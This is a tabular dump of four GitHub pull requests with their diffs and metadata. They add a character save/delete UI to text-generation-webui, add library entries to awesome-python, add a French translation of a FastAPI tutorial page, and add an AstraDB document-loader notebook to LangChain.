title (string, lengths 2 to 169) | diff (string, lengths 235 to 19.5k) | body (string, lengths 0 to 30.5k) | url (string, lengths 48 to 84) | created_at (string, length 20) | closed_at (string, length 20) | merged_at (string, length 20) | updated_at (string, length 20) | diff_len (float64, 101 to 3.99k) | repo_name (string, 83 classes) | __index_level_0__ (int64, 15 to 52.7k) |

|---|---|---|---|---|---|---|---|---|---|---|

Add "Save character" button | diff --git a/modules/chat.py b/modules/chat.py

index 7a21d7be88..a63dcd4069 100644

--- a/modules/chat.py

+++ b/modules/chat.py

@@ -602,3 +602,43 @@ def upload_your_profile_picture(img):

img = make_thumbnail(img)

img.save(Path('cache/pfp_me.png'))

logging.info('Profile picture saved to "cache/pfp_me.png"')

+
+
+def delete_file(path):
+    if path.exists():
+        logging.warning(f'Deleting {path}')
+        path.unlink(missing_ok=True)
+
+
+def save_character(name, greeting, context, picture, filename, instruct=False):
+    if filename == "":
+        logging.error("The filename is empty, so the character will not be saved.")
+        return
+
+    folder = 'characters' if not instruct else 'characters/instruction-following'
+    data = {
+        'name': name,
+        'greeting': greeting,
+        'context': context,
+    }
+
+    data = {k: v for k, v in data.items() if v}  # Strip falsy
+    filepath = Path(f'{folder}/{filename}.yaml')
+    with filepath.open('w') as f:
+        yaml.dump(data, f)
+
+    logging.info(f'Wrote {filepath}')
+    path_to_img = Path(f'{folder}/{filename}.png')
+    if picture and not instruct:
+        picture.save(path_to_img)
+        logging.info(f'Wrote {path_to_img}')
+    elif path_to_img.exists():
+        delete_file(path_to_img)
+
+
+def delete_character(name, instruct=False):
+    folder = 'characters' if not instruct else 'characters/instruction-following'
+    for extension in ["yml", "yaml", "json"]:
+        delete_file(Path(f'{folder}/{name}.{extension}'))
+
+    delete_file(Path(f'{folder}/{name}.png'))

diff --git a/modules/ui.py b/modules/ui.py

index 1e9c4ab0cb..a3e9c2ca14 100644

--- a/modules/ui.py

+++ b/modules/ui.py

@@ -15,6 +15,9 @@

chat_js = f.read()

refresh_symbol = '\U0001f504' # 🔄

+delete_symbol = '🗑️'

+save_symbol = '💾'

+

theme = gr.themes.Default(

font=['Helvetica', 'ui-sans-serif', 'system-ui', 'sans-serif'],

font_mono=['IBM Plex Mono', 'ui-monospace', 'Consolas', 'monospace'],

@@ -89,3 +92,11 @@ def refresh():

outputs=[refresh_component]

)

return refresh_button

+
+
+def create_delete_button(**kwargs):
+    return ToolButton(value=delete_symbol, **kwargs)
+
+
+def create_save_button(**kwargs):
+    return ToolButton(value=save_symbol, **kwargs)

diff --git a/server.py b/server.py

index 2b8b36cd99..669b2d62c4 100644

--- a/server.py

+++ b/server.py

@@ -581,12 +581,20 @@ def create_interface():

shared.gradio['chat_style'] = gr.Dropdown(choices=utils.get_available_chat_styles(), label='Chat style', value=shared.settings['chat_style'], visible=shared.settings['mode'] != 'instruct')

with gr.Tab('Chat settings', elem_id='chat-settings'):

- with gr.Row():

- shared.gradio['character_menu'] = gr.Dropdown(choices=utils.get_available_characters(), label='Character', elem_id='character-menu', info='Used in chat and chat-instruct modes.')

- ui.create_refresh_button(shared.gradio['character_menu'], lambda: None, lambda: {'choices': utils.get_available_characters()}, 'refresh-button')

-

with gr.Row():

with gr.Column(scale=8):

+ with gr.Row():

+ shared.gradio['character_menu'] = gr.Dropdown(choices=utils.get_available_characters(), label='Character', elem_id='character-menu', info='Used in chat and chat-instruct modes.')

+ ui.create_refresh_button(shared.gradio['character_menu'], lambda: None, lambda: {'choices': utils.get_available_characters()}, 'refresh-button')

+ shared.gradio['save_character'] = ui.create_save_button(elem_id='refresh-button')

+ shared.gradio['delete_character'] = ui.create_delete_button(elem_id='refresh-button')

+

+ shared.gradio['save_character-filename'] = gr.Textbox(lines=1, label='File name:', interactive=True, visible=False)

+ shared.gradio['save_character-confirm'] = gr.Button('Confirm save character', elem_classes="small-button", variant='primary', visible=False)

+ shared.gradio['save_character-cancel'] = gr.Button('Cancel', elem_classes="small-button", visible=False)

+ shared.gradio['delete_character-confirm'] = gr.Button('Confirm delete character', elem_classes="small-button", variant='stop', visible=False)

+ shared.gradio['delete_character-cancel'] = gr.Button('Cancel', elem_classes="small-button", visible=False)

+

shared.gradio['name1'] = gr.Textbox(value=shared.settings['name1'], lines=1, label='Your name')

shared.gradio['name2'] = gr.Textbox(value=shared.settings['name2'], lines=1, label='Character\'s name')

shared.gradio['context'] = gr.Textbox(value=shared.settings['context'], lines=4, label='Context')

@@ -596,7 +604,10 @@ def create_interface():

shared.gradio['character_picture'] = gr.Image(label='Character picture', type='pil')

shared.gradio['your_picture'] = gr.Image(label='Your picture', type='pil', value=Image.open(Path('cache/pfp_me.png')) if Path('cache/pfp_me.png').exists() else None)

- shared.gradio['instruction_template'] = gr.Dropdown(choices=utils.get_available_instruction_templates(), label='Instruction template', value='None', info='Change this according to the model/LoRA that you are using. Used in instruct and chat-instruct modes.')

+ with gr.Row():

+ shared.gradio['instruction_template'] = gr.Dropdown(choices=utils.get_available_instruction_templates(), label='Instruction template', value='None', info='Change this according to the model/LoRA that you are using. Used in instruct and chat-instruct modes.')

+ ui.create_refresh_button(shared.gradio['instruction_template'], lambda: None, lambda: {'choices': utils.get_available_instruction_templates()}, 'refresh-button')

+

shared.gradio['name1_instruct'] = gr.Textbox(value='', lines=2, label='User string')

shared.gradio['name2_instruct'] = gr.Textbox(value='', lines=1, label='Bot string')

shared.gradio['context_instruct'] = gr.Textbox(value='', lines=4, label='Context')

@@ -831,7 +842,6 @@ def create_interface():

lambda x: gr.update(visible=x != 'instruct'), shared.gradio['mode'], shared.gradio['chat_style'], show_progress=False).then(

chat.redraw_html, shared.reload_inputs, shared.gradio['display'])

-

shared.gradio['chat_style'].change(chat.redraw_html, shared.reload_inputs, shared.gradio['display'])

shared.gradio['instruction_template'].change(

partial(chat.load_character, instruct=True), [shared.gradio[k] for k in ['instruction_template', 'name1_instruct', 'name2_instruct']], [shared.gradio[k] for k in ['name1_instruct', 'name2_instruct', 'dummy', 'dummy', 'context_instruct', 'turn_template']])

@@ -848,6 +858,31 @@ def create_interface():

chat.save_history, shared.gradio['mode'], None, show_progress=False).then(

chat.redraw_html, shared.reload_inputs, shared.gradio['display'])

+ # Save/delete a character

+ shared.gradio['save_character'].click(

+ lambda x: x, shared.gradio['name2'], shared.gradio['save_character-filename'], show_progress=True).then(

+ lambda: [gr.update(visible=True)] * 3, None, [shared.gradio[k] for k in ['save_character-filename', 'save_character-confirm', 'save_character-cancel']], show_progress=False)

+

+ shared.gradio['save_character-cancel'].click(

+ lambda: [gr.update(visible=False)] * 3, None, [shared.gradio[k] for k in ['save_character-filename', 'save_character-confirm', 'save_character-cancel']], show_progress=False)

+

+ shared.gradio['save_character-confirm'].click(

+ partial(chat.save_character, instruct=False), [shared.gradio[k] for k in ['name2', 'greeting', 'context', 'character_picture', 'save_character-filename']], None).then(

+ lambda: [gr.update(visible=False)] * 3, None, [shared.gradio[k] for k in ['save_character-filename', 'save_character-confirm', 'save_character-cancel']], show_progress=False).then(

+ lambda x: x, shared.gradio['save_character-filename'], shared.gradio['character_menu'])

+

+ shared.gradio['delete_character'].click(

+ lambda: [gr.update(visible=True)] * 2, None, [shared.gradio[k] for k in ['delete_character-confirm', 'delete_character-cancel']], show_progress=False)

+

+ shared.gradio['delete_character-cancel'].click(

+ lambda: [gr.update(visible=False)] * 2, None, [shared.gradio[k] for k in ['delete_character-confirm', 'delete_character-cancel']], show_progress=False)

+

+ shared.gradio['delete_character-confirm'].click(

+ partial(chat.delete_character, instruct=False), shared.gradio['character_menu'], None).then(

+ lambda: gr.update(choices=utils.get_available_characters()), outputs=shared.gradio['character_menu']).then(

+ lambda: 'None', None, shared.gradio['character_menu']).then(

+ lambda: [gr.update(visible=False)] * 2, None, [shared.gradio[k] for k in ['delete_character-confirm', 'delete_character-cancel']], show_progress=False)

+

shared.gradio['download_button'].click(lambda x: chat.save_history(x, timestamp=True), shared.gradio['mode'], shared.gradio['download'])

shared.gradio['Upload character'].click(chat.upload_character, [shared.gradio['upload_json'], shared.gradio['upload_img_bot']], [shared.gradio['character_menu']])

shared.gradio['character_menu'].change(

| Added a save and delete button. | https://api.github.com/repos/oobabooga/text-generation-webui/pulls/1870 | 2023-05-07T03:43:50Z | 2023-05-21T00:48:45Z | 2023-05-21T00:48:45Z | 2023-05-21T00:50:23Z | 2,301 | oobabooga/text-generation-webui | 26,482 |
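As a rough illustration of the `save_character` logic in the diff above, the sketch below isolates its two pure steps: dropping empty fields and deriving the output paths. The helper names `build_character_record` and `character_paths` are hypothetical and do not appear in the PR. The YAML write and the image save are left out so that the snippet needs only the standard library.

```python
from pathlib import Path


def build_character_record(name, greeting, context):
    """Hypothetical helper: keep only the non-empty fields ("Strip falsy")."""
    data = {'name': name, 'greeting': greeting, 'context': context}
    return {k: v for k, v in data.items() if v}


def character_paths(filename, instruct=False):
    """Hypothetical helper: derive the .yaml and .png paths for a character."""
    folder = 'characters/instruction-following' if instruct else 'characters'
    return Path(folder) / f'{filename}.yaml', Path(folder) / f'{filename}.png'


# An empty greeting is dropped from the record before it would be written.
record = build_character_record('Assistant', '', 'A helpful bot.')
yaml_path, png_path = character_paths('assistant')
print(record)
print(yaml_path.as_posix(), png_path.as_posix())
```

Keeping these steps free of file I/O makes them easy to check in isolation; the PR itself performs the write inline.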

Add docxtpl, loguru | diff --git a/README.md b/README.md

index 4510dd251..d823a6f52 100644

--- a/README.md

+++ b/README.md

@@ -772,6 +772,7 @@ Inspired by [awesome-php](https://github.com/ziadoz/awesome-php).

* [logbook](http://logbook.readthedocs.io/en/stable/) - Logging replacement for Python.

* [logging](https://docs.python.org/3/library/logging.html) - (Python standard library) Logging facility for Python.

* [raven](https://github.com/getsentry/raven-python) - Python client for Sentry, a log/error tracking, crash reporting and aggregation platform for web applications.

+* [loguru](https://github.com/Delgan/loguru) - Library which aims to bring enjoyable logging in Python.

## Machine Learning

@@ -1016,6 +1017,7 @@ Inspired by [awesome-php](https://github.com/ziadoz/awesome-php).

* [XlsxWriter](https://github.com/jmcnamara/XlsxWriter) - A Python module for creating Excel .xlsx files.

* [xlwings](https://github.com/ZoomerAnalytics/xlwings) - A BSD-licensed library that makes it easy to call Python from Excel and vice versa.

* [xlwt](https://github.com/python-excel/xlwt) / [xlrd](https://github.com/python-excel/xlrd) - Writing and reading data and formatting information from Excel files.

+ * [docxtpl](https://github.com/elapouya/python-docx-template) - Editing a docx document by jinja2 template

* PDF

* [PDFMiner](https://github.com/euske/pdfminer) - A tool for extracting information from PDF documents.

* [PyPDF2](https://github.com/mstamy2/PyPDF2) - A library capable of splitting, merging and transforming PDF pages.

| Add docxtpl

Add loguru

| https://api.github.com/repos/vinta/awesome-python/pulls/1453 | 2020-01-14T07:17:28Z | 2020-07-09T05:21:41Z | 2020-07-09T05:21:41Z | 2020-07-09T05:21:41Z | 426 | vinta/awesome-python | 27,334 |

🌐 Add French translation for `docs/fr/docs/tutorial/query-params-str-validations.md` | diff --git a/docs/fr/docs/tutorial/query-params-str-validations.md b/docs/fr/docs/tutorial/query-params-str-validations.md

new file mode 100644

index 0000000000000..f5248fe8b3297

--- /dev/null

+++ b/docs/fr/docs/tutorial/query-params-str-validations.md

@@ -0,0 +1,305 @@

+# Paramètres de requête et validations de chaînes de caractères

+

+**FastAPI** vous permet de déclarer des informations et des validateurs additionnels pour vos paramètres de requêtes.

+

+Commençons avec cette application pour exemple :

+

+```Python hl_lines="9"

+{!../../../docs_src/query_params_str_validations/tutorial001.py!}

+```

+

+Le paramètre de requête `q` a pour type `Union[str, None]` (ou `str | None` en Python 3.10), signifiant qu'il est de type `str` mais pourrait aussi être égal à `None`, et bien sûr, la valeur par défaut est `None`, donc **FastAPI** saura qu'il n'est pas requis.

+

+!!! note

+ **FastAPI** saura que la valeur de `q` n'est pas requise grâce à la valeur par défaut `= None`.

+

+ Le `Union` dans `Union[str, None]` permettra à votre éditeur de vous offrir un meilleur support et de détecter les erreurs.

+

+## Validation additionnelle

+

+Nous allons imposer que bien que `q` soit un paramètre optionnel, dès qu'il est fourni, **sa longueur n'excède pas 50 caractères**.

+

+## Importer `Query`

+

+Pour cela, importez d'abord `Query` depuis `fastapi` :

+

+```Python hl_lines="3"

+{!../../../docs_src/query_params_str_validations/tutorial002.py!}

+```

+

+## Utiliser `Query` comme valeur par défaut

+

+Construisez ensuite la valeur par défaut de votre paramètre avec `Query`, en choisissant 50 comme `max_length` :

+

+```Python hl_lines="9"

+{!../../../docs_src/query_params_str_validations/tutorial002.py!}

+```

+

+Comme nous devons remplacer la valeur par défaut `None` dans la fonction par `Query()`, nous pouvons maintenant définir la valeur par défaut avec le paramètre `Query(default=None)`, il sert le même objectif qui est de définir cette valeur par défaut.

+

+Donc :

+

+```Python

+q: Union[str, None] = Query(default=None)

+```

+

+... rend le paramètre optionnel, et est donc équivalent à :

+

+```Python

+q: Union[str, None] = None

+```

+

+Mais déclare explicitement `q` comme étant un paramètre de requête.

+

+!!! info

+ Gardez à l'esprit que la partie la plus importante pour rendre un paramètre optionnel est :

+

+ ```Python

+ = None

+ ```

+

+ ou :

+

+ ```Python

+ = Query(None)

+ ```

+

+ et utilisera ce `None` pour détecter que ce paramètre de requête **n'est pas requis**.

+

+ Le `Union[str, None]` est uniquement là pour permettre à votre éditeur un meilleur support.

+

+Ensuite, nous pouvons passer d'autres paramètres à `Query`. Dans cet exemple, le paramètre `max_length` qui s'applique aux chaînes de caractères :

+

+```Python

+q: Union[str, None] = Query(default=None, max_length=50)

+```

+

+Cela va valider les données, montrer une erreur claire si ces dernières ne sont pas valides, et documenter le paramètre dans le schéma `OpenAPI` de cette *path operation*.

+

+## Rajouter plus de validation

+

+Vous pouvez aussi rajouter un second paramètre `min_length` :

+

+```Python hl_lines="9"

+{!../../../docs_src/query_params_str_validations/tutorial003.py!}

+```

+

+## Ajouter des validations par expressions régulières

+

+On peut définir une <abbr title="Une expression régulière, regex ou regexp est une suite de caractères qui définit un pattern de correspondance pour les chaînes de caractères.">expression régulière</abbr> à laquelle le paramètre doit correspondre :

+

+```Python hl_lines="10"

+{!../../../docs_src/query_params_str_validations/tutorial004.py!}

+```

+

+Cette expression régulière vérifie que la valeur passée comme paramètre :

+

+* `^` : commence avec les caractères qui suivent, avec aucun caractère avant ceux-là.

+* `fixedquery` : a pour valeur exacte `fixedquery`.

+* `$` : se termine directement ensuite, n'a pas d'autres caractères après `fixedquery`.

+

+Si vous vous sentez perdu avec le concept d'**expression régulière**, pas d'inquiétudes. Il s'agit d'une notion difficile pour beaucoup, et l'on peut déjà réussir à faire beaucoup sans jamais avoir à les manipuler.

+

+Mais si vous décidez d'apprendre à les utiliser, sachez qu'ensuite vous pouvez les utiliser directement dans **FastAPI**.

+

+## Valeurs par défaut

+

+De la même façon que vous pouvez passer `None` comme premier argument pour l'utiliser comme valeur par défaut, vous pouvez passer d'autres valeurs.

+

+Disons que vous déclarez le paramètre `q` comme ayant une longueur minimale de `3`, et une valeur par défaut étant `"fixedquery"` :

+

+```Python hl_lines="7"

+{!../../../docs_src/query_params_str_validations/tutorial005.py!}

+```

+

+!!! note "Rappel"

+ Avoir une valeur par défaut rend le paramètre optionnel.

+

+## Rendre ce paramètre requis

+

+Quand on ne déclare ni validation, ni métadonnée, on peut rendre le paramètre `q` requis en ne lui déclarant juste aucune valeur par défaut :

+

+```Python

+q: str

+```

+

+à la place de :

+

+```Python

+q: Union[str, None] = None

+```

+

+Mais maintenant, on déclare `q` avec `Query`, comme ceci :

+

+```Python

+q: Union[str, None] = Query(default=None, min_length=3)

+```

+

+Donc pour déclarer une valeur comme requise tout en utilisant `Query`, il faut utiliser `...` comme premier argument :

+

+```Python hl_lines="7"

+{!../../../docs_src/query_params_str_validations/tutorial006.py!}

+```

+

+!!! info

+ Si vous n'avez jamais vu ce `...` auparavant : c'est une des constantes natives de Python <a href="https://docs.python.org/fr/3/library/constants.html#Ellipsis" class="external-link" target="_blank">appelée "Ellipsis"</a>.

+

+Cela indiquera à **FastAPI** que la présence de ce paramètre est obligatoire.

+

+## Liste de paramètres / valeurs multiples via Query

+

+Quand on définit un paramètre de requête explicitement avec `Query` on peut aussi déclarer qu'il reçoit une liste de valeur, ou des "valeurs multiples".

+

+Par exemple, pour déclarer un paramètre de requête `q` qui peut apparaître plusieurs fois dans une URL, on écrit :

+

+```Python hl_lines="9"

+{!../../../docs_src/query_params_str_validations/tutorial011.py!}

+```

+

+Ce qui fait qu'avec une URL comme :

+

+```

+http://localhost:8000/items/?q=foo&q=bar

+```

+

+vous recevriez les valeurs des multiples paramètres de requête `q` (`foo` et `bar`) dans une `list` Python au sein de votre fonction de **path operation**, dans le paramètre de fonction `q`.

+

+Donc la réponse de cette URL serait :

+

+```JSON

+{

+ "q": [

+ "foo",

+ "bar"

+ ]

+}

+```

+

+!!! tip "Astuce"

+ Pour déclarer un paramètre de requête de type `list`, comme dans l'exemple ci-dessus, il faut explicitement utiliser `Query`, sinon cela sera interprété comme faisant partie du corps de la requête.

+

+La documentation sera donc mise à jour automatiquement pour autoriser plusieurs valeurs :

+

+<img src="/img/tutorial/query-params-str-validations/image02.png">

+

+### Combiner liste de paramètres et valeurs par défaut

+

+Et l'on peut aussi définir une liste de valeurs par défaut si aucune n'est fournie :

+

+```Python hl_lines="9"

+{!../../../docs_src/query_params_str_validations/tutorial012.py!}

+```

+

+Si vous allez à :

+

+```

+http://localhost:8000/items/

+```

+

+la valeur par défaut de `q` sera : `["foo", "bar"]`

+

+et la réponse sera :

+

+```JSON

+{

+ "q": [

+ "foo",

+ "bar"

+ ]

+}

+```

+

+#### Utiliser `list`

+

+Il est aussi possible d'utiliser directement `list` plutôt que `List[str]` :

+

+```Python hl_lines="7"

+{!../../../docs_src/query_params_str_validations/tutorial013.py!}

+```

+

+!!! note

+ Dans ce cas-là, **FastAPI** ne vérifiera pas le contenu de la liste.

+

+ Par exemple, `List[int]` vérifiera (et documentera) que la liste est bien entièrement composée d'entiers. Alors qu'un simple `list` ne ferait pas cette vérification.

+

+## Déclarer des métadonnées supplémentaires

+

+On peut aussi ajouter plus d'informations sur le paramètre.

+

+Ces informations seront incluses dans le schéma `OpenAPI` généré et utilisées par la documentation interactive ou les outils externes utilisés.

+

+!!! note

+ Gardez en tête que les outils externes utilisés ne supportent pas forcément tous parfaitement OpenAPI.

+

+ Il se peut donc que certains d'entre eux n'utilisent pas toutes les métadonnées que vous avez déclarées pour le moment, bien que dans la plupart des cas, les fonctionnalités manquantes ont prévu d'être implémentées.

+

+Vous pouvez ajouter un `title` :

+

+```Python hl_lines="10"

+{!../../../docs_src/query_params_str_validations/tutorial007.py!}

+```

+

+Et une `description` :

+

+```Python hl_lines="13"

+{!../../../docs_src/query_params_str_validations/tutorial008.py!}

+```

+

+## Alias de paramètres

+

+Imaginez que vous vouliez que votre paramètre se nomme `item-query`.

+

+Comme dans la requête :

+

+```

+http://127.0.0.1:8000/items/?item-query=foobaritems

+```

+

+Mais `item-query` n'est pas un nom de variable valide en Python.

+

+Le nom le plus proche serait `item_query`.

+

+Mais vous avez vraiment envie que ce soit exactement `item-query`...

+

+Pour cela vous pouvez déclarer un `alias`, et cet alias est ce qui sera utilisé pour trouver la valeur du paramètre :

+

+```Python hl_lines="9"

+{!../../../docs_src/query_params_str_validations/tutorial009.py!}

+```

+

+## Déprécier des paramètres

+

+Disons que vous ne vouliez plus utiliser ce paramètre désormais.

+

+Il faut qu'il continue à exister pendant un certain temps car vos clients l'utilisent, mais vous voulez que la documentation mentionne clairement que ce paramètre est <abbr title="obsolète, recommandé de ne pas l'utiliser">déprécié</abbr>.

+

+On utilise alors l'argument `deprecated=True` de `Query` :

+

+```Python hl_lines="18"

+{!../../../docs_src/query_params_str_validations/tutorial010.py!}

+```

+

+La documentation le présentera comme il suit :

+

+<img src="/img/tutorial/query-params-str-validations/image01.png">

+

+## Pour résumer

+

+Il est possible d'ajouter des validateurs et métadonnées pour vos paramètres.

+

+Validateurs et métadonnées génériques:

+

+* `alias`

+* `title`

+* `description`

+* `deprecated`

+

+Validateurs spécifiques aux chaînes de caractères :

+

+* `min_length`

+* `max_length`

+* `regex`

+

+Parmi ces exemples, vous avez pu voir comment déclarer des validateurs pour les chaînes de caractères.

+

+Dans les prochains chapitres, vous verrez comment déclarer des validateurs pour d'autres types, comme les nombres.

| Hey everyone! 👋

Here is the PR to translate the **query params and string validations** page of the tutorial documentation into French.

See the French translation tracking issue [here](https://github.com/tiangolo/fastapi/issues/1972).

Thanks for the reviews👌 | https://api.github.com/repos/tiangolo/fastapi/pulls/4075 | 2021-10-20T20:14:50Z | 2023-07-27T18:53:22Z | 2023-07-27T18:53:22Z | 2023-07-27T18:53:22Z | 2,983 | tiangolo/fastapi | 22,680 |
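The translated page describes three string constraints on an optional query parameter: `min_length`, `max_length` and a regular expression. The sketch below mimics those checks with the standard library only. It is not FastAPI's implementation, and the function name `check_query_value` and its defaults are assumptions chosen to match the values used in the tutorial text.

```python
import re
from typing import Optional


def check_query_value(
    q: Optional[str],
    min_length: int = 3,
    max_length: int = 50,
    pattern: str = r"^fixedquery$",
) -> Optional[str]:
    """Hypothetical helper: apply length and regex checks to an optional string."""
    if q is None:
        # An omitted optional parameter is accepted as-is.
        return None
    if len(q) < min_length:
        raise ValueError(f"q must have at least {min_length} characters")
    if len(q) > max_length:
        raise ValueError(f"q must have at most {max_length} characters")
    if re.search(pattern, q) is None:
        raise ValueError(f"q must match {pattern!r}")
    return q


print(check_query_value(None))
print(check_query_value("fixedquery"))
```

In an actual FastAPI application these constraints are declared on the parameter with `Query(...)`, as the tutorial shows, rather than checked by hand.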

Add doc for AstraDB document loader | diff --git a/docs/docs/integrations/document_loaders/astradb.ipynb b/docs/docs/integrations/document_loaders/astradb.ipynb

new file mode 100644

index 00000000000000..da8c7c40437c97

--- /dev/null

+++ b/docs/docs/integrations/document_loaders/astradb.ipynb

@@ -0,0 +1,185 @@

+{

+ "cells": [

+ {

+ "attachments": {},

+ "cell_type": "markdown",

+ "metadata": {

+ "id": "vm8vn9t8DvC_"

+ },

+ "source": [

+ "# AstraDB"

+ ]

+ },

+ {

+ "cell_type": "markdown",

+ "metadata": {},

+ "source": [

+ "DataStax [Astra DB](https://docs.datastax.com/en/astra/home/astra.html) is a serverless vector-capable database built on Cassandra and made conveniently available through an easy-to-use JSON API."

+ ]

+ },

+ {

+ "attachments": {},

+ "cell_type": "markdown",

+ "metadata": {

+ "id": "5WjXERXzFEhg"

+ },

+ "source": [

+ "## Overview"

+ ]

+ },

+ {

+ "attachments": {},

+ "cell_type": "markdown",

+ "metadata": {

+ "id": "juAmbgoWD17u"

+ },

+ "source": [

+ "The AstraDB Document Loader returns a list of Langchain Documents from an AstraDB database.\n",

+ "\n",

+ "The Loader takes the following parameters:\n",

+ "\n",

+ "* `api_endpoint`: AstraDB API endpoint. Looks like `https://01234567-89ab-cdef-0123-456789abcdef-us-east1.apps.astra.datastax.com`\n",

+ "* `token`: AstraDB token. Looks like `AstraCS:6gBhNmsk135....`\n",

+ "* `collection_name` : AstraDB collection name\n",

+ "* `namespace`: (Optional) AstraDB namespace\n",

+ "* `filter_criteria`: (Optional) Filter used in the find query\n",

+ "* `projection`: (Optional) Projection used in the find query\n",

+ "* `find_options`: (Optional) Options used in the find query\n",

+ "* `nb_prefetched`: (Optional) Number of documents pre-fetched by the loader\n",

+ "* `extraction_function`: (Optional) A function to convert the AstraDB document to the LangChain `page_content` string. Defaults to `json.dumps`\n",

+ "\n",

+ "The following metadata is set to the LangChain Documents metadata output:\n",

+ "\n",

+ "```python\n",

+ "{\n",

+ " metadata : {\n",

+ " \"namespace\": \"...\", \n",

+ " \"api_endpoint\": \"...\", \n",

+ " \"collection\": \"...\"\n",

+ " }\n",

+ "}\n",

+ "```"

+ ]

+ },

+ {

+ "attachments": {},

+ "cell_type": "markdown",

+ "metadata": {},

+ "source": [

+ "## Load documents with the Document Loader"

+ ]

+ },

+ {

+ "cell_type": "code",

+ "execution_count": null,

+ "metadata": {},

+ "outputs": [],

+ "source": [

+ "from langchain_community.document_loaders import AstraDBLoader"

+ ]

+ },

+ {

+ "cell_type": "code",

+ "outputs": [],

+ "source": [

+ "from getpass import getpass\n",

+ "\n",

+ "ASTRA_DB_API_ENDPOINT = input(\"ASTRA_DB_API_ENDPOINT = \")\n",

+ "ASTRA_DB_APPLICATION_TOKEN = getpass(\"ASTRA_DB_APPLICATION_TOKEN = \")"

+ ],

+ "metadata": {

+ "collapsed": false,

+ "ExecuteTime": {

+ "end_time": "2024-01-08T12:41:22.643335Z",

+ "start_time": "2024-01-08T12:40:57.759116Z"

+ }

+ },

+ "execution_count": 4

+ },

+ {

+ "cell_type": "code",

+ "execution_count": 6,

+ "metadata": {

+ "ExecuteTime": {

+ "end_time": "2024-01-08T12:42:25.395162Z",

+ "start_time": "2024-01-08T12:42:25.391387Z"

+ }

+ },

+ "outputs": [],

+ "source": [

+ "loader = AstraDBLoader(\n",

+ " api_endpoint=ASTRA_DB_API_ENDPOINT,\n",

+ " token=ASTRA_DB_APPLICATION_TOKEN,\n",

+ " collection_name=\"movie_reviews\",\n",

+ " projection={\"title\": 1, \"reviewtext\": 1},\n",

+ " find_options={\"limit\": 10},\n",

+ ")"

+ ]

+ },

+ {

+ "cell_type": "code",

+ "outputs": [],

+ "source": [

+ "docs = loader.load()"

+ ],

+ "metadata": {

+ "collapsed": false,

+ "ExecuteTime": {

+ "end_time": "2024-01-08T12:42:30.236489Z",

+ "start_time": "2024-01-08T12:42:29.612133Z"

+ }

+ },

+ "execution_count": 7

+ },

+ {

+ "cell_type": "code",

+ "execution_count": 8,

+ "metadata": {

+ "ExecuteTime": {

+ "end_time": "2024-01-08T12:42:31.369394Z",

+ "start_time": "2024-01-08T12:42:31.359003Z"

+ }

+ },

+ "outputs": [

+ {

+ "data": {

+ "text/plain": "Document(page_content='{\"_id\": \"659bdffa16cbc4586b11a423\", \"title\": \"Dangerous Men\", \"reviewtext\": \"\\\\\"Dangerous Men,\\\\\" the picture\\'s production notes inform, took 26 years to reach the big screen. After having seen it, I wonder: What was the rush?\"}', metadata={'namespace': 'default_keyspace', 'api_endpoint': 'https://01234567-89ab-cdef-0123-456789abcdef-us-east1.apps.astra.datastax.com', 'collection': 'movie_reviews'})"

+ },

+ "execution_count": 8,

+ "metadata": {},

+ "output_type": "execute_result"

+ }

+ ],

+ "source": [

+ "docs[0]"

+ ]

+ }

+ ],

+ "metadata": {

+ "colab": {

+ "collapsed_sections": [

+ "5WjXERXzFEhg"

+ ],

+ "provenance": []

+ },

+ "kernelspec": {

+ "display_name": "Python 3 (ipykernel)",

+ "language": "python",

+ "name": "python3"

+ },

+ "language_info": {

+ "codemirror_mode": {

+ "name": "ipython",

+ "version": 3

+ },

+ "file_extension": ".py",

+ "mimetype": "text/x-python",

+ "name": "python",

+ "nbconvert_exporter": "python",

+ "pygments_lexer": "ipython3",

+ "version": "3.9.18"

+ }

+ },

+ "nbformat": 4,

+ "nbformat_minor": 4

+}

diff --git a/libs/community/langchain_community/document_loaders/__init__.py b/libs/community/langchain_community/document_loaders/__init__.py

index ca295e538ebe40..bf2ac63bce1116 100644

--- a/libs/community/langchain_community/document_loaders/__init__.py

+++ b/libs/community/langchain_community/document_loaders/__init__.py

@@ -34,6 +34,7 @@

from langchain_community.document_loaders.assemblyai import (

AssemblyAIAudioTranscriptLoader,

)

+from langchain_community.document_loaders.astradb import AstraDBLoader

from langchain_community.document_loaders.async_html import AsyncHtmlLoader

from langchain_community.document_loaders.azlyrics import AZLyricsLoader

from langchain_community.document_loaders.azure_ai_data import (

@@ -248,6 +249,7 @@

"ArcGISLoader",

"ArxivLoader",

"AssemblyAIAudioTranscriptLoader",

+ "AstraDBLoader",

"AsyncHtmlLoader",

"AzureAIDataLoader",

"AzureAIDocumentIntelligenceLoader",

diff --git a/libs/community/tests/unit_tests/document_loaders/test_imports.py b/libs/community/tests/unit_tests/document_loaders/test_imports.py

index a2101c8830d399..d730f6bfc19a33 100644

--- a/libs/community/tests/unit_tests/document_loaders/test_imports.py

+++ b/libs/community/tests/unit_tests/document_loaders/test_imports.py

@@ -21,6 +21,7 @@

"ArcGISLoader",

"ArxivLoader",

"AssemblyAIAudioTranscriptLoader",

+ "AstraDBLoader",

"AsyncHtmlLoader",

"AzureAIDataLoader",

"AzureAIDocumentIntelligenceLoader",

| <!-- Thank you for contributing to LangChain!

Please title your PR "<package>: <description>", where <package> is whichever of langchain, community, core, experimental, etc. is being modified.

Replace this entire comment with:

- **Description:** a description of the change,

- **Issue:** the issue # it fixes if applicable,

- **Dependencies:** any dependencies required for this change,

- **Twitter handle:** we announce bigger features on Twitter. If your PR gets announced, and you'd like a mention, we'll gladly shout you out!

Please make sure your PR is passing linting and testing before submitting. Run `make format`, `make lint` and `make test` from the root of the package you've modified to check this locally.

See contribution guidelines for more information on how to write/run tests, lint, etc: https://python.langchain.com/docs/contributing/

If you're adding a new integration, please include:

1. a test for the integration, preferably unit tests that do not rely on network access,

2. an example notebook showing its use. It lives in `docs/docs/integrations` directory.

If no one reviews your PR within a few days, please @-mention one of @baskaryan, @eyurtsev, @hwchase17.

-->

See preview : https://langchain-git-fork-cbornet-astra-loader-doc-langchain.vercel.app/docs/integrations/document_loaders/astradb | https://api.github.com/repos/langchain-ai/langchain/pulls/15703 | 2024-01-08T13:34:39Z | 2024-01-08T20:21:46Z | 2024-01-08T20:21:46Z | 2024-01-08T20:54:14Z | 2,210 | langchain-ai/langchain | 43,723 |
